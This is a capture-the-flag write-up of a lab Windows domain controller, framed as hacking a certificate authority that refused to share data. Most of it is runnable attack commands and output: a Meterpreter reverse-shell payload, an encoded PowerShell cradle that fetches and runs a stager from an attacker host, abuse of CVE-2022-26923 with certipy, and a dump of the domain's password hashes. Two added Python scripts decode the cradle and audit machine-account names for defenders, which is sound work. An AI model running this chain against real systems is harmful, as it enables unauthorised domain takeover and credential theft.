Certification
A Certification Authority has declined our requests to access their data in order to identify a well known APT group. Unfortunately we do not have the jurisdiction to force them to cooperate. For this reason you are tasked with hacking their infrastructure in order to gather information.
Enumeration:
sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp open http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57496/tcp open msrpc Microsoft Windows RPC
59262/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64924/tcp open msrpc Microsoft Windows RPC
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126
SMB 10.129.230.126 445 CFN-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)
Visit http://10.129.230.126:8000/ and log in with admin:admin. The settings page http://10.129.230.126:8000/settings/global allows you to define commands that are triggered by different events, e.g. Before Rename.
Preparation:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1
nano Public/bp-simple-runim64.ps1
echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA
cd Public/
sudo python3 -m http.server 80
Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive a Meterpreter session.
meterpreter > cat user.txt
HTB{Abu51ng_F34tur3s_4r3_fun}
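Added here as an example, not part of the original writeup: the same encoded command seen from the defender's side, decoding the -enc argument of a process-creation log line (constructed, carrying the blob above) and flagging the download-cradle indicators in it.

```python
# Added example (not part of the original writeup): decode the -enc argument of
# a PowerShell command line the way a detection engineer reviews process-creation
# logs, then flag download-cradle indicators in the decoded script.
import base64
import binascii
import re
from typing import Dict, Optional

# Constructed process-creation log line; the encoded blob is the one used above.
SAMPLE_CMDLINE = (
    "powershell.exe -enc "
    "aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4A"
    "ZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQA"
    "cgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMA"
    "LwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA"
)

# Substrings that mark a download-and-execute cradle (matched case-insensitively).
CRADLE_INDICATORS = ("iex", "invoke-expression", "downloadstring",
                     "net.webclient", "invoke-webrequest")

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the blob is base64 of the
# script in UTF-16LE, which is why such blobs show a recurring "A" (the NUL bytes).
ENC_ARG = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a valid encoded command; leave it for manual review

def analyze_cmdline(cmdline: str) -> Dict[str, object]:
    """Decode the command line and summarise what a triage analyst would want."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "indicators": [], "urls": []}
    lowered = script.lower()
    return {
        "decoded": script,
        "indicators": sorted(i for i in CRADLE_INDICATORS if i in lowered),
        # Remote sources the cradle pulls from; the stager URL above surfaces here.
        "urls": re.findall(r"https?://[^\s'\"()]+", script),
    }
```

Running analyze_cmdline(SAMPLE_CMDLINE) returns the cleartext cradle, the three indicators it contains and the stager URL, which is what an alert on this process-creation event should carry.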
Nice. Discover user credentials:
meterpreter > cat applist.ps1
$user = "daniel.morgan"
$pass = "FDOnolk(naws)"
The challenge name hints at ADCS. A recent vulnerability is presented here:
Enumeration:
certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'
...
Template Name : Machine
Certificate Authorities : certification-CFN-SVRDC01-CA
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDnsAsCn
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Application Policies :
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATION.HTB\Domain Admins
CERTIFICATION.HTB\Domain Computers
CERTIFICATION.HTB\Enterprise Admins
...
Looks good! Exploitation:
sudo nano /etc/hosts
10.129.224.146 CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb
(IP address has changed due to reboots)
Create a new machine account wtf$ and use the -dns flag to abuse CVE-2022-26923.
certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)
Password:
[*] Creating new account:
sAMAccountName : wtf$
unicodePwd : J6AeabTzuSGNFElP
userAccountControl : 4096
servicePrincipalName : HOST/wtf
RestrictedKrbHost/wtf
dnsHostName : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'
Now request a certificate. The only difference from the blog post is the -dynamic-endpoint flag (the request did not work without it).
certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'
Use the certificate to retrieve the NT hash of the domain controller account:
certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a
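Added here as an example, not part of the original writeup: the audit a defender would run against the step above, checking a snapshot of computer objects for a dNSHostName that does not belong to the account holding it. The snapshot is constructed; wtf$ and the domain controller mirror the values shown above, CFN-WKS001$ is sample data.

```python
# Added example (not part of the original writeup): audit AD computer objects
# for a dNSHostName that does not belong to the account holding it, which is
# the attribute abuse behind CVE-2022-26923. Constructed snapshot: 'wtf$' and
# the DC mirror the writeup, 'CFN-WKS001$' is sample data.
from typing import Dict, List, Tuple

WORKSTATION_TRUST_ACCOUNT = 0x1000   # userAccountControl 4096, as in the output above
SERVER_TRUST_ACCOUNT = 0x2000        # set on domain controller accounts
TRUSTED_FOR_DELEGATION = 0x80000

COMPUTERS: List[Dict[str, object]] = [
    {"sAMAccountName": "CFN-SVRDC01$", "dNSHostName": "CFN-SVRDC01.certification.htb",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "CFN-WKS001$", "dNSHostName": "CFN-WKS001.certification.htb",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "wtf$", "dNSHostName": "CFN-SVRDC01.certification.htb",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
]
DOMAIN = "certification.htb"

def expected_dns_name(sam: str, domain: str) -> str:
    """A machine account is expected to hold <hostname>.<domain> for its own name."""
    return f"{sam.rstrip('$')}.{domain}".lower()

def audit_dns_hostnames(computers, domain) -> List[Tuple[str, str]]:
    """Return (account, reason) findings for suspicious dNSHostName values."""
    findings = []
    claims: Dict[str, List[str]] = {}   # dNSHostName -> accounts claiming it
    dc_names = {str(c["dNSHostName"]).lower() for c in computers
                if int(c["userAccountControl"]) & SERVER_TRUST_ACCOUNT}
    for c in computers:
        sam = str(c["sAMAccountName"])
        dns = str(c["dNSHostName"]).lower()
        is_dc = bool(int(c["userAccountControl"]) & SERVER_TRUST_ACCOUNT)
        claims.setdefault(dns, []).append(sam)
        if dns == expected_dns_name(sam, domain):
            continue
        reason = "dNSHostName does not match sAMAccountName"
        if dns in dc_names and not is_dc:
            # Exactly the wtf$ case: a workstation account wearing the DC's name,
            # which a Machine-template certificate would then be issued for.
            reason += "; value belongs to a domain controller"
        findings.append((sam, reason))
    for dns, accounts in claims.items():
        if len(accounts) > 1:
            findings.append((",".join(accounts), f"dNSHostName '{dns}' claimed by several accounts"))
    return findings
```

The same mismatch is visible at change time in a 4742 (computer account changed) event whose new dNSHostName differs from the account name, so the check can run on either a directory snapshot or the event stream.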
DCSync:
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds
SMB 10.129.224.146 445 CFN-SVRDC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.224.146 445 CFN-SVRDC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB 10.129.224.146 445 CFN-SVRDC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.224.146 445 CFN-SVRDC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB 10.129.224.146 445 CFN-SVRDC01 daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB 10.129.224.146 445 CFN-SVRDC01 SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB 10.129.224.146 445 CFN-SVRDC01 wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::
Collect flag:
impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb
# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt
HTB{c3rtif1c4t35_c4n_8e_f4k3d}
Excellent.